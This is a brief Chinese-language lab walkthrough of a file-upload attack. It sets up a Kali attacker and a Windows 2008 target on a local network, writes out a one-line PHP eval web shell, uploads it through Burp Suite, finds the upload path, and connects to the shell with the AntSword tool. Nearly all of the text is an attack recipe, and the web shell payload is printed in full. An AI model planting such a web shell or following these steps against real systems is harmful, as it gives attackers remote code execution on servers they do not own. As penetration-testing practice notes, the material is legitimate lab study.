一、环境搭配
攻击机: | kali | IP: | 192.168.0.112 |
靶机: | Windows2008 | IP: | 192.168.0.130:9006 |
二、文件上传
1、制作一句话木马
命令:<?php @eval($_POST['hacker']); ?>
2、设置代理
设置浏览器代理
设置BurpSuite代理
3、文件上传
设置完Payload后,点击Start attcck。
复制URL,进入浏览器,发现图片上传成功,右键点击图片使用新标签打开图片,可以发现图片上传的路径。
4、使用蚁剑连接木马
添加数据:将图片路径复制到URL地址,设置密码(一句话木马中的Hacker),成功连接。